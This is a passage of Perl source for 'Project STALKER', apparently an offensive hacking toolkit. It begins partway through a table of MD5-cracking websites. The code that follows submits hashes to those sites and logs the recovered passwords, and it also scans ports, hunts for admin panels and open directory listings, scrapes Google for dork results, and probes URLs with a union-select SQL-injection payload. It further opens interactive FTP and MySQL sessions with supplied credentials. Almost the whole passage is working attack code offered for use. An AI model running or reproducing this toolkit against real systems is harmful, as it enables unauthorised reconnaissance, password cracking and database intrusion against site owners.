    'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
    'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
    },
    'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
    'tipo' => 'post',
    'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
    'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
    },
    'http://victorov.su/md5/?md5e=&md5d=' =>  {
    'tipo' => 'get',
    'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
    }
    );

    for my $data(keys %hash) {

    if ($hash{$data}{tipo} eq "get") {
    $code = toma($data.$_[0]);
    if ($code=~/$hash{$data}{regex}/ig) {
    print "\n[+] Decoded : ".$1."\n\n";
    saveyes("logs/pass-found.txt",$secret.":".$1);
    }
    } else {
    $code = tomar($data,$hash{$data}{variables});
    if ($code=~/$hash{$data}{regex}/ig) {
    saveyes("logs/pass-found.txt",$secret.":".$1);
    }
    }
    }
    print "\n[+] Finish\n";
    }

    sub ftp {

    my ($ftp,$user,$pass) = @_;

    if (my $socket = Net::FTP->new($ftp)) {
    if ($socket->login($user,$pass)) {

    print "\n[+] Enter of the server FTP\n\n";

    menu:

    print "\n\nftp>";
    chomp (my $cmd = <stdin>);
    print "\n\n";

    if ($cmd=~/help/) {
    print q(

    help : show information
    cd : change directory <dir>
    dir : list a directory
    mdkdir : create a directory <dir>
    rmdir : delete a directory <dir>
    pwd : directory 
    del : delete a file <file>
    rename : change name of the a file <file1> <file2>
    size : size of the a file <file>
    put : upload a file <file>
    get : download a file <file>
    cdup : change dir <dir>
    exit : ??


    );
    }

    if ($cmd=~/dir/ig) {
    if (my @files = $socket->dir()) {
    for(@files) {
    print "[+] ".$_."\n";
    }
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/pwd/ig) {
    print "[+] Path : ".$socket->pwd()."\n";
    }

    if ($cmd=~/cd (.*)/ig) {
    if ($socket->cwd($1)) {
    print "[+] Directory changed\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/cdup/ig) {
    if (my $dir = $socket->cdup()) {
    print "\n\n[+] Directory changed\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/del (.*)/ig) {
    if ($socket->delete($1)) {
    print "[+] File deleted\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/rename (.*) (.*)/ig) {
    if ($socket->rename($1,$2)) {
    print "[+] File Updated\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/mkdir (.*)/ig) {
    if ($socket->mkdir($1)) {
    print "\n\n[+] Directory created\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/rmdir (.*)/ig) {
    if ($socket->rmdir($1)) {
    print "\n\n[+] Directory deleted\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/exit/ig) {
    next;
    }

    if ($cmd=~/get (.*) (.*)/ig) {
    print "\n\n[+] Downloading file\n\n";
    if ($socket->get($1,$2)) {
    print "[+] Download completed";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/put (.*) (.*)/ig) {
    print "\n\n[+] Uploading file\n\n";
    if ($socket->put($1,$2)) {
    print "[+] Upload completed";
    } else {
    print "\n\n[-] Error\n\n";
    }
    }

    if ($cmd=~/quit/) {
    next;
    }

    goto menu;

    } else {
    print "\n[-] Failed the login\n\n";
    }

    } else {
    print "\n\n[-] Error\n\n";
    }



    }


    sub scanpaths {

    my $urla = $_[0];

    print "\n[+] Find paths in $urla\n\n\n";
    my @urls = repes(get_links(toma($urla)));
    for $url(@urls) {
    my $web = $url;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
    if ($_[0] =~/$auth/ or $auth eq "") {
    if ($path=~/(.*)\/(.*)\.(.*)$/) {
    my $borrar = $2.".".$3;
    if ($web=~/(.*)$borrar/) {
    my $co = $1;
    unless ($co=~/$auth/) {
    $co = $urla.$co;
    }
    $code = toma($co);
    if ($code=~/Index Of/ig) {
    print "[Link] : ".$co."\n";
    saveyes("logs/paths-found.txt",$co);
    }}}}}
    print "\n\n[+] Finish\n";
    }


    sub scanport {

    my %ports = ("21"=>"ftp",
    "22"=>"ssh",
    "25"=>"smtp",
    "80"=>"http",
    "110"=>"pop3",
    "3306"=>"mysql"
    );


    print "[+] Scanning $_[0]\n\n\n";

    for my $port(keys %ports) {

    if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
    print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
    }
    }
    print "\n\n[+] Finish\n";
    }


    sub scanpanel {
    print "[+] Scanning $_[0]\n\n\n";
    for $path(@panels) {
    $code = tomax($_[0]."/".$path);
    if ($code->is_success) {
    print "[Link] : ".$_[0]."/".$path."\n";
    saveyes("logs/panel-logs.txt",$_[0]."/".$path);
    }
    }
    print "\n\n[+] Finish\n";
    }

    sub google {
    my($a,$b) = @_;
    for ($pages=10;$pages<=$b;$pages=$pages+10) {
    $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
    my @links = get_links($code);
    for my $l(@links) {
    if ($l =~/webcache.googleusercontent.com/) {
    push(@url,$l);
    }
    }
    }

    for(@url) {
    if ($_ =~/cache:(.*?):(.*?)\+/) {
    push(@founds,$2);
    }
    }

    my @founds = repes(@founds);

    return @founds;
    }


    sub sql {

    my ($pass1,$pass2) = ("+","--");
    my $page = shift;
    $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    if ($code1=~/The used SELECT statements have a different number of columns/ig) {
    print "[+] SQLI : $page\a\n";
    saveyes("logs/sql-logs.txt",$page);
    }}

    sub get_links {

    my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
    return @links;

    sub agarrar {
    my ($a,%b) = @_;
    push(@links,values %b);
    }

    }

    sub repes {
    foreach $test(@_) {
    push @limpio,$test unless $repe{$test}++;
    }
    return @limpio;
    }

    sub head {
    cprint "\x0311"; #13
    print "\n\n-- == Project STALKER == --\n\n";
    cprint "\x030";
    }

    sub copyright {
    cprint "\x0311"; #13
    print"\n\n(C) Doddy Hackman 2011\n\n";
    cprint "\x030";
    }

    sub toma {
    return $nave->get($_[0])->content;
    }

    sub tomax {
    return $nave->get($_[0]);
    }

    sub tomar {
    my ($web,$var) = @_;
    return $nave->post($web,[%{$var}])->content;
    }


    sub conectar {

    my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
    Proto => "tcp",Timeout  => 5);

    print $sockex $_[2]."\r\n";
    $sockex->read($re,5000);
    $sockex->close;
    return $re."\r\n";
    }


    sub enter {

    my ($host,$user,$pass) = @_;

    print "[+] Connecting to the server\n";

    $info = "dbi:mysql::".$host.":3306";
    if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {

    print "\n[+] Enter in the database";

    while(1) {
    print "\n\n\n[+] Query : ";
    chomp(my $ac = <stdin>);

    if ($ac eq "exit") {
    $enter->disconnect;
    print "\n\n[+] Closing connection\n\n";
    last;
    }

    $re = $enter->prepare($ac);
    $re->execute();
    my $total = $re->rows();

    my @columnas = @{$re->{NAME}};

    if ($total eq "-1") {
    print "\n\n[-] Query Error\n";
    next;
    } else {
    print "\n\n[+] Result of the query\n";
    if ($total eq 0) {
    print "\n\n[+] Not rows returned\n\n";
    } else {
    print "\n\n[+] Rows returned : ".$total."\n\n\n";
    for(@columnas) {
    print $_."\t\t";
    }
    print "\n\n";
    while (@row = $re->fetchrow_array) {
    for(@row) {
    print $_."\t\t";
    }
    print "\n";
    }}}}
    } else {
    print "\n[-] Error connecting\n";
    }}

    sub saveyes {
    open (SAVE,">>".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub savefile {
    open (SAVE,">>logs/webs/".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub coleccionar {
    opendir DIR,$_[0];
    my @archivos = readdir DIR;
    close DIR;
    return @archivos;
    }

    sub helpme {

    cprint "\x0310"; #13
    print qq(

    Commands :


    getinfo
    getip <host>
    getlink <page>
    getprocess
    killprocess <name process> <pid process>
    conec <host> <port> <command> 
    allow <host>
    paths <page>
    encodehex <text>
    decodehex <text>
    encodeascii <text>
    decodeascii <text>
    encodebase <text>
    decodebase <text>
    scanport <host>
    panel <page>
    getpass <hash>
    kobra <page>
    ftp <host> <user> <pass>
    mysql <host> <user> <pass>
    navegator
    scangoogle
    help
    exit

    );
    cprint "\x030";
    }

    #
    #  The End ?
    #


    Eso es todo